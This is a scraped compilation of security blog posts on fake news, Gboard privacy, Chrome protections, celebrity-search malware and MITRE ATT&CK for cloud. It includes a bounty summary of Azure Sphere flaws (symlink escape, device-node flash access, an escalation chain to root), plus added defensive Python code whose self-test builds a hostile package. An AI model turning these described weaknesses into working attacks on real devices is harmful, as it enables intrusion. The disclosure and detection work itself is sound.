There’s a good reason for that. Bad actors who wish to foment unrest, unease, or simply spread disinformation use emotionally driven content to plant a seed. Whether or not their original story gets picked up and viewed firsthand doesn’t matter to these bad actors. Their aim is to actually get some manner of disinformation out into the ecosystem. They rely on others who will re-post, re-tweet, or otherwise pass it along on their behalf—to the point where the original source of the information is completely lost. This is one instance where people readily begin to accept certain information as fact, even if it’s not factual at all.

Certainly, some legitimate articles will generate a response as well, yet it’s a good habit to do a quick fact check and confirm what you’ve read. This leads us right back to our earlier points about considering the source and cross-checking against other sources of information as well.

Keep an eye out for “sponsored content”

You’ve probably seen headlines similar to this before: THIS FAT-BURNING TRICK HAS DOCTORS BAFFLED! You’ll usually spot them in big blocks laden with catchy photos and illustrations, almost to the point that they look like they’re links to other news stories. They’re not. They’re ads, which often strike a sensationalistic tone.

The next time you spot one of these, look around the area of the web page where they’re placed. You should find a little graphic or snippet of text that says “Advertisement,” “Paid Sponsor,” or something similar. And there you go. You spotted some sponsored content. These so-called articles aren’t intentionally developed to misinform you. They are likely trying to bait you into buying something.

However, in some less reputable corners of the web ads like these can take you to malicious sites that install malware or expose you to other threats. Always surf with web browser protection. Good browser protection will either identify such links as malicious right away or prevent your browser from proceeding to the malicious site if you click on such a link.

Be helpful, not right

So, let’s say you’ve been following these practices of media literacy for a while. What do you do when you see a friend posting what appears to be misinformation on their social media account? If you’re inclined to step in and comment, try to be helpful, not right.

We can only imagine how many spoiled relationships and “unfriendings” have occurred thanks to moments where one person comments on a post with the best intentions of “setting the record straight,” only to see tempers flare. We’ve all seen it happen. The original poster, instead of being open to the new information, digs in their heels and becomes that much more convinced of being right on the topic.

One way to keep your friendships and good feelings intact is this: instead of entering the conversation with the intention of being “right,” help people discover the facts for themselves. You can present your information as part of a discussion on the topic. So while you shouldn’t expect this to act like a magic wand that whisks away misinformation, what you can do is provide a path toward a reputable source of information that the original poster, and their friends, can follow if they wish.

Be safe out there

Wherever your online travels take you as you read and research the news, be sure to go out there with a complete security suite. In addition to providing virus protection, it will also help protect your identity and privacy as you do anything online. Also look for an option that will protect your mobile devices too, as we spend plenty of time scrolling through our social media feeds on our smartphones.

If you’re interested in learning more about savvy media consumption, pop open a tab and give these articles a read—they’ll give you a great start:

Bots in the Twittersphere: Pew Research
How to Spot Fake News: FactCheck.org

Likewise, keep an eye on your own habits. We forward news in our social media feeds too—so follow these same good habits when you feel like it’s time to post. Make sure that what you share is truthful too.

Be safe, be well-read, and be helpful!


The post Spot Fake News and Misinformation in Your Social Media Feed appeared first on McAfee Blogs.

Privacy-Preserving Smart Input with Gboard

Google Keyboard (a.k.a Gboard) has a critical mission to provide frictionless input on Android to empower users to communicate accurately and express themselves effortlessly. In order to accomplish this mission, Gboard must also protect users' private and sensitive data. Nothing users type is sent to Google servers. We recently launched privacy-preserving input by further advancing the latest federated technologies. In Android 11, Gboard also launched the contextual input suggestion experience by integrating on-device smarts into the user's daily communication in a privacy-preserving way.

Before Android 11, input suggestions were surfaced to users in several different places. In Android 11, Gboard launched a consistent and coordinated approach to access contextual input suggestions. For the first time, we've brought Smart Replies to the keyboard suggestions - powered by system intelligence running entirely on device. The smart input suggestions are rendered with a transparent layer on top of Gboard’s suggestion strip. This structure maintains the trust boundaries between the Android platform and Gboard, meaning sensitive personal content cannot be accessed by Gboard. The suggestions are only sent to the app after the user taps to accept them.

For instance, when a user receives the message “Have a virtual coffee at 5pm?” in WhatsApp, on-device system intelligence predicts smart text and emoji replies “Sounds great!” and “👍”. Android system intelligence can see the incoming message but Gboard cannot. In Android 11, these Smart Replies are rendered by the Android platform on Gboard’s suggestion strip as a transparent layer. The suggested reply is generated by the system intelligence. When the user taps the suggestion, the Android platform sends it to the input field directly. If the user doesn't tap the suggestion, Gboard and the app cannot see it. In this way, Android and Gboard surface the best of Google smarts whilst keeping users' data private: none of their data goes to any app, including the keyboard, unless they've tapped a suggestion.

Additionally, federated learning has enabled Gboard to train intelligent input models across many devices while keeping everything individual users type on their device. Today, emoji are as common as punctuation and have become the way for our users to express themselves in messaging. Our users want fresh and diversified emojis to better express their thoughts in messaging apps. Recently, we launched new on-device transformer models that are fine-tuned with federated learning in Gboard, to produce more contextual emoji predictions for English, Spanish and Portuguese.

Furthermore, following the success of privacy-preserving machine learning techniques, Gboard continues to leverage federated analytics to understand how Gboard is used from decentralized data. What we've learned from privacy-preserving analysis has let us make better decisions in our product.

When a user shares an emoji in a conversation, their phone keeps an ongoing count of which emojis are used. Later, when the phone is idle, plugged in, and connected to WiFi, Google’s federated analytics server invites the device to join a “round” of federated analytics data computation with hundreds of other participating phones. Every device involved in one round will compute the emoji share frequency, encrypt the result and send it to a federated analytics server. Although the server can’t decrypt the data individually, the final tally of total emoji counts can be decrypted when combining encrypted data across devices. The aggregated data shows that the most popular emoji is 😂 in WhatsApp, 😭 in Roblox (gaming), and ✔ in Google Docs. Emoji 😷 moved up from 119th to 42nd in terms of frequency during COVID-19.
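The round described above can be illustrated with pairwise additive masking, one common secure-aggregation construction. This is an added example, not Gboard's code, and the post does not say which scheme Gboard uses; the modulus, the device names and the sample emoji logs are constructed for the illustration.

```python
import secrets
from collections import Counter

MODULUS = 2**32                    # assumed: all arithmetic is done modulo 2^32
EMOJI = ["😂", "😭", "✔", "😷"]    # histogram order agreed by every device


def local_histogram(emoji_log):
    """Per-device emoji counts in EMOJI order; never leaves the device unmasked."""
    counts = Counter(emoji_log)
    return [counts[e] for e in EMOJI]


def pairwise_masks(device_ids, length):
    """Return {device: mask} such that all masks sum to zero modulo MODULUS.

    Each pair (a, b) shares one random vector: a adds it, b subtracts it.
    In a deployed protocol the pair derives it from a key agreement so the
    server never sees it; here it is drawn centrally to keep the demo short.
    """
    masks = {d: [0] * length for d in device_ids}
    ids = sorted(device_ids)
    for i, a in enumerate(ids):
        for b in ids[i + 1:]:
            shared = [secrets.randbelow(MODULUS) for _ in range(length)]
            for k, s in enumerate(shared):
                masks[a][k] = (masks[a][k] + s) % MODULUS
                masks[b][k] = (masks[b][k] - s) % MODULUS
    return masks


def masked_report(histogram, mask):
    """What a device uploads: its counts hidden under its mask."""
    return [(h + m) % MODULUS for h, m in zip(histogram, mask)]


def aggregate(reports):
    """Server side: add the uploads. Masks cancel only if every device reports."""
    total = [0] * len(EMOJI)
    for report in reports:
        for k, value in enumerate(report):
            total[k] = (total[k] + value) % MODULUS
    return dict(zip(EMOJI, total))


def run_round(device_logs):
    """Run one round and return (per-device uploads, aggregated tally)."""
    masks = pairwise_masks(list(device_logs), len(EMOJI))
    reports = {
        device: masked_report(local_histogram(log), masks[device])
        for device, log in device_logs.items()
    }
    return reports, aggregate(reports.values())


# Constructed sample data: three phones and the emoji each one shared.
SAMPLE_LOGS = {
    "phone-a": ["😂", "😂", "😷"],
    "phone-b": ["😭", "😂", "✔"],
    "phone-c": ["😂", "😭", "😷"],
}

if __name__ == "__main__":
    uploads, tally = run_round(SAMPLE_LOGS)
    for device, upload in uploads.items():
        print(device, "uploads", upload)   # looks random to the server
    print("tally:", tally)                 # exact counts across all devices
```

If a device drops out after the masks are fixed, its partners' masks no longer cancel and the tally is garbage, which is why production protocols add a recovery step for dropouts.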

Gboard always has a strong commitment to Google’s Privacy Principles. Gboard strives to build privacy-preserving effortless input products for users to freely express their thoughts in 900+ languages while safeguarding user data. We will keep pushing the state of the art in smart input technologies on Android while safeguarding user data. Stay tuned!

Celebrating multi-national cultures this Hispanic Heritage Month

Do you know the difference between Hispanic and Latino? What about the traditions that are important parts of the Hispanic culture? Or beloved Spanish or Portuguese phrases that don’t come across in English?

McAfee’s team spans 45 countries, making us a team rich in cultural diversity. We are always learning more about each other and celebrate Latin culture year-round. To commemorate Hispanic Heritage Month, which runs from September 15 – October 15, we’ve asked members of our McAfee Latino Community for their unique perspective on what being Latino means to them and to share more of the distinctive elements of their country of origin and traditions.

Check out some of the wonderful responses we received:

What Being Latino Means to Me:

Favorite Things About Being Latino:

We couldn’t be more proud to celebrate Hispanic Heritage Month by elevating the voices of our team members and celebrating the diverse backgrounds and cultures that make up McAfee.

Simply put, a welcoming work culture where every team member feels accepted and celebrated is part of our DNA. We value all voices which make up McAfee and appreciate how they further enrich our culture.

Interested in joining a company that supports inclusion and belonging? Search our jobs. Subscribe to job alerts. 

 

The post Celebrating multi-national cultures this Hispanic Heritage Month appeared first on McAfee Blogs.

Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program

From June to August, part of the McAfee Advanced Threat Research (ATR) team participated in Microsoft’s Azure Sphere Research Challenge. Our research resulted in reporting multiple vulnerabilities classified by Microsoft as “important” or “critical” in the platform that, to date, have qualified for over $160,000 USD in bounty awards scheduled to be contributed to the ACLU ($100,000), St. Jude’s Children’s Research Hospital ($50,000) and PDX Hackerspace (approximately $20,000). With these contributions, we hope to support and give back to our local hacker community, which has really stepped up to help during the COVID crisis, and also to recognize, at a larger scale, the importance of protecting and furthering civil liberties and the wellbeing of those most in need.

This blog post is a high-level overview of the program, why we chose to take part in it, and a brief description of our findings. A detailed technical walkthrough of our findings can be found here.

Additionally, Microsoft has released two summary blogs detailing the Azure Sphere Bounty Program as a whole, including McAfee’s efforts and findings. They can be found here:

MSRC Blog

Azure Sphere Core Team Blog

What is Azure Sphere and the Azure Sphere Research Challenge? 

In late May Microsoft started a new bug bounty program for its Azure Sphere platform. Azure Sphere is a hardened IoT device with a secure communication link to the cloud that has been in development for the last few years and reached general availability in early 2020. Microsoft designed and built it from scratch to ensure every aspect of it is as secure as possible per their security model. To put the theory to the test, Microsoft invited a few select partners and hackers to try their best to defeat its security measures.

The Azure Sphere team came up with multiple scenarios that would test the security model of the device and qualify for an increased payout from the regular Azure Bug Bounty program. These scenarios range from the ability to bypass certain security measures, to executing code in the hardware-enabled secure core of the device.

Research scenarios specific to the Azure Sphere Research Challenge 

Why did ATR get involved with the program? 

There are multiple reasons why we were keen to participate in this program. First, as security researchers, the Azure Sphere platform is an exciting new research target that has been built from the ground up with security in mind. It showcases what might become of the IoT space in the next few years as legacy platforms are slowly phased out. Being at the forefront of what is being done in the IoT space ensures our research remains current and we are ready to tackle future new challenges. Second, by finding critical bugs in this new platform we help make it more secure and offer our support to make the IoT space increasingly resistant to cyber threats. Finally, as this is a bug bounty program, we decided from the start that we would donate any award we received to charity, thus using our skills to contribute to the social good of our local communities and support causes that transcend the technology sector.   

Findings 

We’ve reported multiple bugs to Microsoft as a result of our research that were rated Important or Critical: 

  • Important – Security Feature bypass ($3,300): The inclusion of symlink in application package allows for referencing files outside of the application package mount point. 
  • Critical – RCE ($48,000): The inclusion of character device in an application package allows for direct interaction with a part of the flash memory, eventually leading to the modification of critical system files and further exploitation. 
  • Important – EoP ($11,000): Multiple bugs in how uid_map files are processed, allowing for elevation of privilege to the sys user.  
  • Important – EoP ($11,000): A user with sys privileges can trick Application Manager into unmounting “azcore” and mount a rogue binary in its stead. Triggering a core dump of a running process will then execute the rogue binary with full capabilities & root privileges due to improper handling of permissions in the LSM. 
  • Critical – EoP ($48,000): Further problems in the privilege dropping of azcore lead to the complete bypass of Azure Sphere capability restrictions. 
  • Critical – EoP ($48,000): Due to improper certificate management, it is possible to re-claim a device on the Azure Sphere pre-prod server and obtain a valid capability file that works in the prod environment. This capability file can be used to re-enable application development mode on a finalized device (claimed by a third party). The deployment of the capability file requires physical access to a device.  
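The first two findings both come down to a package carrying something other than plain files. The check below is an added example, not Microsoft's or McAfee's code: it audits an archive for links that resolve outside the package root and for device nodes before anything is mounted or extracted. A tar archive stands in for the Azure Sphere image package format, and all entry names are constructed.

```python
import io
import posixpath
import tarfile


def escapes_root(path):
    """True if a path is absolute or climbs above the package root."""
    norm = posixpath.normpath(path)
    return posixpath.isabs(path) or norm == ".." or norm.startswith("../")


def audit_package(tar_bytes):
    """Return [(entry name, reason)] for entries a loader should refuse.

    Links are resolved lexically only. A link that points at another link is
    not followed, so a stricter policy is to reject every link outright.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar.getmembers():
            if escapes_root(member.name):
                findings.append((member.name, "entry path escapes package root"))
            elif member.isdev():
                # Character/block devices and FIFOs have no place in app data.
                findings.append((member.name, "device node"))
            elif member.issym() or member.islnk():
                # Symlink targets are relative to the link's own directory,
                # hard-link targets are relative to the archive root.
                base = posixpath.dirname(member.name) if member.issym() else ""
                if escapes_root(posixpath.join(base, member.linkname)):
                    findings.append((member.name, "link target escapes package root"))
            elif not (member.isreg() or member.isdir()):
                findings.append((member.name, "unsupported entry type"))
    return findings


def build_sample_package():
    """Constructed test package: one file, one safe link, one escaping link, one device."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"{}"
        manifest = tarfile.TarInfo("app/manifest.json")
        manifest.size = len(data)
        tar.addfile(manifest, io.BytesIO(data))

        safe = tarfile.TarInfo("app/current")
        safe.type = tarfile.SYMTYPE
        safe.linkname = "manifest.json"          # stays inside app/
        tar.addfile(safe)

        escaping = tarfile.TarInfo("app/data")
        escaping.type = tarfile.SYMTYPE
        escaping.linkname = "../../outside"      # resolves above the root
        tar.addfile(escaping)

        device = tarfile.TarInfo("app/flash0")
        device.type = tarfile.CHRTYPE
        device.devmajor, device.devminor = 90, 0  # arbitrary numbers for the demo
        tar.addfile(device)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_package(build_sample_package()):
        print(f"REJECT {name}: {reason}")
```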

Conclusion 

This research was an exciting opportunity to look at a new platform with very little prior research, while still being in the familiar territory of an ARM device running a hardened Linux operating system.

Through the bugs we found we were able to get a full chain exploit from a locked device to having root access. However, the Azure Sphere platform has many more security features such as remote attestation, and a hardware-enabled secure core that is still holding strong.

Finally, we want to thank Microsoft for the opportunity of participating in this exciting program, and the bounty awards.

The post Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program appeared first on McAfee Blogs.

New Password Protections (and more!) in Chrome

Passwords are often the first line of defense for our digital lives. Today, we’re improving password security on both Android and iOS devices by telling you if the passwords you’ve asked Chrome to remember have been compromised, and if so, how to fix them.

To check whether you have any compromised passwords, Chrome sends a copy of your usernames and passwords to Google using a special form of encryption. This lets Google check them against lists of credentials known to be compromised, but Google cannot derive your username or password from this encrypted copy.

We notify you when you have compromised passwords on websites, but it can be time-consuming to go find the relevant form to change your password. To help, we’re adding support for ".well-known/change-password" URLs that let Chrome take users directly to the right “change password” form after they’ve been alerted that their password has been compromised.

Along with these improvements, Chrome is also bringing Safety Check to mobile. In our next release, we will launch Safety Check on iOS and Android, which includes checking for compromised passwords, telling you if Safe Browsing is enabled, and whether the version of Chrome you are running is updated with the latest security protections. You will also be able to use Chrome on iOS to autofill saved login details into other apps or browsers.

In Chrome 86 we’ll also be launching a number of additional features to improve user security, including:

Enhanced Safe Browsing for Android

Earlier this year, we launched Enhanced Safe Browsing for desktop, which gives Chrome users the option of more advanced security protections.

When you turn on Enhanced Safe Browsing, Chrome can proactively protect you against phishing, malware, and other dangerous sites by sharing real-time data with Google’s Safe Browsing service. Among our users who have enabled checking websites and downloads in real time, our predictive phishing protections see a roughly 20% drop in users typing their passwords into phishing sites.

Improvements to password filling on iOS

We recently launched Touch-to-fill for passwords on Android to prevent phishing attacks. To improve security on iOS too, we’re introducing a biometric authentication step before autofilling passwords. On iOS, you’ll now be able to authenticate using Face ID, Touch ID, or your phone passcode. Additionally, Chrome Password Manager allows you to autofill saved passwords into iOS apps or browsers if you enable Chrome autofill in Settings.


Mixed form warnings and download blocking

Update (10/07/2020): Mixed form warnings were originally scheduled for Chrome 86, but will be delayed until Chrome 87.

Secure HTTPS pages may sometimes still have non-secure features. Earlier this year, Chrome began securing and blocking what’s known as “mixed content”, when secure pages incorporate insecure content. But there are still other ways that HTTPS pages can create security risks for users, such as offering downloads over non-secure links, or using forms that don’t submit data securely.

To better protect users from these threats, Chrome 86 is introducing mixed form warnings on desktop and Android to alert and warn users before submitting a non-secure form that’s embedded in an HTTPS page.

Additionally, Chrome 86 will block or warn on some insecure downloads initiated by secure pages. Currently, this change affects commonly abused file types, but eventually secure pages will only be able to initiate secure downloads of any type. For more details, see Chrome’s plan to gradually block mixed downloads altogether.

We encourage developers to update their forms and downloads to use secure connections for the safety and privacy of their users.
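One way for a site owner to find the two problems described above before users see a warning, as an added example that is not code from Chrome or from the original post: it parses the HTML of a page served over HTTPS and reports forms that submit to `http://` targets and download links that resolve to `http://`. The `RISKY_EXTENSIONS` set, the `audit` helper and the sample page are assumptions constructed for illustration; the extension set is not Chrome's actual list of blocked file types.

```python
"""Audit an HTTPS page for mixed forms and insecure download links."""
from dataclasses import dataclass
from html.parser import HTMLParser
from posixpath import splitext
from urllib.parse import urljoin, urlsplit

# Assumption: illustrative "commonly abused" extensions, not Chrome's own list.
RISKY_EXTENSIONS = {".exe", ".msi", ".dmg", ".apk", ".zip", ".iso", ".jar"}


@dataclass(frozen=True)
class Finding:
    kind: str            # "mixed-form" or "insecure-download"
    tag: str             # element that carries the insecure URL
    url: str             # absolute URL after resolving against the base
    risky: bool = False  # True when the extension is in RISKY_EXTENSIONS


class MixedContentAuditor(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        if urlsplit(page_url).scheme != "https":
            raise ValueError("audit only applies to pages served over HTTPS")
        self.base_url = page_url
        self.findings = []

    def _resolve(self, value):
        # Relative and scheme-relative (//host/path) URLs inherit https.
        return urljoin(self.base_url, value.strip())

    def _check_form(self, tag, action):
        # A missing or empty action submits to the page itself, which is HTTPS.
        if not action:
            return
        url = self._resolve(action)
        if urlsplit(url).scheme == "http":
            self.findings.append(Finding("mixed-form", tag, url))

    def _check_download(self, tag, href, has_download_attr):
        url = self._resolve(href)
        parts = urlsplit(url)
        if parts.scheme != "http":
            return
        risky = splitext(parts.path)[1].lower() in RISKY_EXTENSIONS
        # Static HTML cannot reveal Content-Disposition, so only links that
        # declare a download or point at a risky extension are reported.
        if has_download_attr or risky:
            self.findings.append(Finding("insecure-download", tag, url, risky))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href"):
            # <base href> changes how later relative URLs resolve.
            self.base_url = urljoin(self.base_url, a["href"])
        elif tag == "form":
            self._check_form(tag, a.get("action"))
        elif tag in ("button", "input") and a.get("formaction"):
            # formaction overrides the parent form's action.
            self._check_form(tag, a["formaction"])
        elif tag in ("a", "area") and a.get("href"):
            self._check_download(tag, a["href"], "download" in a)


def audit(page_url, html):
    """Return the list of findings for one HTTPS page."""
    auditor = MixedContentAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample page (not taken from any real site).
SAMPLE_PAGE = """
<html><head><base href="/app/"></head><body>
<form action="http://login.example.test/session" method="post">
  <input type="password" name="pw">
</form>
<form action="search"><input name="q">
  <button formaction="http://legacy.example.test/q">Old search</button>
</form>
<a href="http://cdn.example.test/setup.EXE">Installer</a>
<a href="//cdn.example.test/setup.exe">Installer (scheme-relative)</a>
<a href="http://cdn.example.test/report" download>Report</a>
<a href="http://news.example.test/article.html">Article</a>
<a href="files/tool.zip">Tool</a>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit("https://shop.example.test/checkout", SAMPLE_PAGE):
        print(finding)
```

Ordinary `http://` navigation links are deliberately not reported, since the changes described above concern form submissions and downloads rather than navigation.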

Cristiano Ronaldo tops McAfee India’s Most Dangerous Celebrity 2020 List


During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyber threats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information. Owing to his international popularity and a fan following that resonates well in India, Cristiano Ronaldo takes the top spot on the India edition of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

Ronaldo is popular not only for his football skills, but also for his lifestyle, brand endorsements, yearly earnings, and large social media following, with fans devotedly tracking his every movement. This year, Ronaldo’s transfer to Juventus from Real Madrid for a reported £105M created quite a buzz, grabbing attention from football enthusiasts worldwide. Within the Top 10 list, Ronaldo is closely followed by veteran actress Tabu (No. 2) and leading Bollywood actresses Taapsee Pannu (No. 3), Anushka Sharma (No. 4) and Sonakshi Sinha (No. 5). Also making the top ten is Indian singer Armaan Malik (No. 6), and young and bubbly actor Sara Ali Khan (No. 7). Rounding out the rest of the top ten are Indian actress Kangana Ranaut (No. 8), followed by popular TV soap actress Divyanka Tripathi (No. 9) and lastly, the King of Bollywood, Shah Rukh Khan (No. 10).

 


Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for new shows, sports, and movies to watch. For example, Ronaldo is strongly associated with malicious search terms, as fans are constantly seeking news on his personal life, as well as searching for news on his latest deals with football clubs. In addition, users may be streaming live football matches through illegal streaming platforms to avoid subscription fees. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity related news, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

 Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

Use parental control software

Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

 Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Cristiano Ronaldo tops McAfee India’s Most Dangerous Celebrity 2020 List appeared first on McAfee Blogs.

How Searching For Your Favourite Celebrity May Not End Well


2020 has certainly been the year for online entertainment. With many Aussies staying home to stay well, the internet and all its offerings have provided the perfect way for us all to pass time. From free movies and TV shows to the latest celebrity news, many of us have devoured digital content to entertain ourselves. But our love affair with online entertainment certainly hasn’t gone unnoticed by cybercriminals who have ‘pivoted’ in response and cleverly adapted their scams to adjust to our insatiable desire for content.

Searching For Our Favourite Celebrities Can Be A Risky Business

Cybercriminals are fully aware that we love searching for online entertainment and celebrity news and so devise their plans accordingly. Many create fake websites that promise users free content from a celebrity of the moment to lure unsuspecting Aussies in. But these malicious websites are purpose-built to trick consumers into sharing their personal information in exchange for the promised free content – and this is where many come unstuck!

Who Are The Most Dangerous Celebrities of 2020?

McAfee, the world’s leading cybersecurity company, has researched which famous names generate the riskiest search results that could potentially trigger consumers to unknowingly install malware on their devices or unwillingly share their private information with cybercriminals.

And in 2020, English singer-songwriter Adele takes out the top honours as her name generates the most harmful links online. Adele is best known for smashing the music charts since 2008 with hit songs including ‘Rolling in the Deep’ and ‘Someone Like You’. In addition to her award-winning music, Adele is also loved for her funny and relatable personality, as seen on her talk show appearances (such as her viral ‘Carpool Karaoke’ segment) and concert footage. Most recently, her weight-loss and fitness journey have received mass media attention, with many trying to get to the bottom of her ‘weight-loss’ secrets.

Trailing Adele as the second most dangerous celebrity is actress and star of the 2020 hit show Stan ‘Love Life’ Anna Kendrick, followed by rapper Drake (no. 3), model and actress Cara Delevingne (no. 4), US TikTok star Charli D’Amelio (no. 5) and singer-songwriter Alicia Keys (no. 6). Rounding out the top ten are ‘Sk8r Boi’ singer Avril Lavigne (No. 7), New Zealand rising music star, Benee (no. 8), songstress Camila Cabello (no. 9), and global superstar, singer and actress Beyonce (no. 10).


Aussies Love Celebrity Gossip

Whether it was boredom or the fact that we just love a stickybeak, our love of celebrity news reached new heights this year with many of us ‘needing’ to stay up to date with the latest gossip from our favourite public figures. Adele’s weight-loss journey (no. 1), Drake’s first photos of ‘secret son’ Adonis (no. 4), and Cara Delevingne’s breakup with US actress Ashley Benson (no. 5), all had us Aussie fans flocking to the internet to search for the latest developments on these celebrity stories.

We’ve Loved New Releases in 2020

With many of us burning through catalogues of available movies and TV shows amid advice to stay at home, new release titles have definitely been the hottest ticket in town to stay entertained.

Rising to fame following her roles in ‘Twilight’ and musical comedy ‘Pitch Perfect’, Anna Kendrick (no. 2) starred in HBO Max series ‘Love Life’ which was released during the peak of COVID-19 in Australia, as well as the 2020 children’s film ‘Trolls World Tour’. R&B and pop megastar Beyonce (no. 10) starred in the 2019 remake of Disney cult classic ‘The Lion King’ and released a visual album ‘Black Is King’ in 2020.

Music Has Soothed Our Souls This Year 

While live concerts and festivals came to a halt earlier this year, many of us are still seeking music – both old and new – to help us navigate these unprecedented times. In fact, musicians make up 50% of the top 10 most dangerous celebrities – hailing from all genres, backgrounds and generations.

Canadian rapper Drake (No. 2) sparked fan interest by dropping his ‘Dark Lanes Demo Tapes’ album including hit songs ‘Chicago Freestyle’ and ‘Tootsie Slide’ that went massively viral on TikTok. New Zealand singer Benee also came out of the woodwork with viral sensations Supalonely and Glitter topping charts and reaching global popularity on TikTok.

Known for her enormously successful R&B/Soul music in the early 2000s, Alicia Keys (no. 6) released a string of new singles in 2020. Camila Cabello’s ‘Senorita’ duet with Canadian singer and now boyfriend Shawn Mendes, was Spotify’s most streamed song of 2019. The couple continued to attract copious attention as fans followed stories reporting on the lovebirds self-isolating together in Miami earlier this year.

How to Avoid Getting Caught In An Online Celebrity Scam

Please don’t feel that getting caught by an ill-intentioned cybercrime is inevitable. If you follow these few simple tips, you can absolutely continue your love of online entertainment and all things celebrity:

  1. Be Careful What You Click

If you are looking for new release music, movies or TV shows or even an update on your favourite celebrity then ALWAYS be cautious and only click on links to reliable sources. Avoid ‘dodgy’ looking websites that promise free content – I guarantee these sites will gift you a big dose of malware. The safest thing is to wait for official releases, use only legitimate streaming sites and visit reputable news sites.

  2. Say NO to Illegal Streaming and Downloading Suspicious Files

Yes, illegal downloads are free but they are usually riddled with malware or adware disguised as mp3 files. Be safe and use only legitimate music streaming platforms – even if it costs a few bucks! Imagine how devastating it would be to lose access to everything on your computer thanks to a nasty piece of malware.

  3. Protect Your Online Safety With A CyberSecurity Solution

One of the best ways of safeguarding yourself (and your family) from cybercriminals is by investing in a comprehensive cybersecurity solution like McAfee’s Total Protection. This Rolls Royce cybersecurity package will protect you from malware, spyware, ransomware and phishing attacks. An absolute no brainer!

  4. Get Parental Controls Working For You

Kids love celebrities too! Parental control software allows you to introduce limits to your kids’ viewing which will help minimise their exposure to potentially malicious or inappropriate websites when they are searching for the latest news on TikTok star Charli D’Amelio or go to download the latest Benee track.

I don’t know how my family of 6 would have survived this year without online entertainment. We’ve devoured the content from three different streaming services, listened to a record number of hours on Spotify and filled our heads with news courtesy of online news sites. And while things are looking up, it will be a while before life returns to normal. So, please take a little time to educate your family on the importance of ‘thinking before you click’ and the perils of illegal downloading. Let’s not make 2020 any more complicated!!

Stay safe everyone!

 

Alex x

The post How Searching For Your Favourite Celebrity May Not End Well appeared first on McAfee Blogs.

MITRE ATT&CK for Cloud: Adoption and Value Study by UC Berkeley CLTC

Are you prepared to detect and defend against attacks that target your data in cloud services, or apps you’ve built that are hosted in the cloud? 

Background 

Nearly all enterprises and public sector customers we work with have enabled cloud use in their organization, with many seeing a 600%+ increase [1] in use in the March-April timeframe of 2020, when the shift to remote work rapidly took shape.

The first step to developing a strong cloud security posture is visibility over the often hundreds of services your employees use, what data is within these services, and then how they are being used collaboratively with third parties and other destinations outside of your control. 

With that visibility, you can establish full control over end-user activity and data in the cloud, applying your policy at every entry and exit point to the cloud.  

That covers your risk stemming from legitimate use by employees, external collaborators, and even API-connected marketplace apps, but what about your adversaries? If someone phished your CEO, stole their OneDrive credentials and exfiltrated data, would you know? What if your CEO used the same password across multiple accounts, and the adversary had access to apps like Smartsheet, Workday, or Salesforce? Are you set up to detect this kind of multi-cloud attack? 

Our Research to Uncover the Best Solution  

Most enterprise security operations centers (SOCs) use MITRE ATT&CK to map the events they see in their environment to a common language of adversary tactics and techniques. This helps to understand gaps in protection, model how attackers progress from access to exfiltration (or encryption/destruction), and to plan out security policy decisions.  

The original ATT&CK framework applied to Windows/Mac/Linux environments, with Android/iOS included as well. For cloud environments, the MITRE ATT&CK framework has a shorter history (released October 2019), but is quickly gaining adoption as the model for cloud threat investigation.

In collaboration with the University of California Berkeley’s Center for Long-Term Cybersecurity (CLTC) and MITRE, we sought to uncover how enterprises investigate threats in the cloud, with a focus on MITRE ATT&CK. In this initiative, researchers from UC Berkeley CLTC conducted a survey of 325 enterprises in a wide range of industries, with 1K employees or above, split between the US, UK, and Australia. The Berkeley team also conducted 10 in-depth interviews with security leaders in various cybersecurity functions.  

Findings 

MITRE has done an excellent job identifying and categorizing adversary tactics and techniques used in the cloud. When asked how prevalent these tactics were in their environment, an average of 81% of our survey respondents had experienced each of the tactics in the Cloud Matrix. 58% had experienced the initial access phase of an attack at least monthly.

Given the frequency with which most enterprises experience these adversary tactics and techniques, we found widespread adoption of the ATT&CK Cloud Matrix, with 97% of our respondents either planning to use or already using the Matrix.

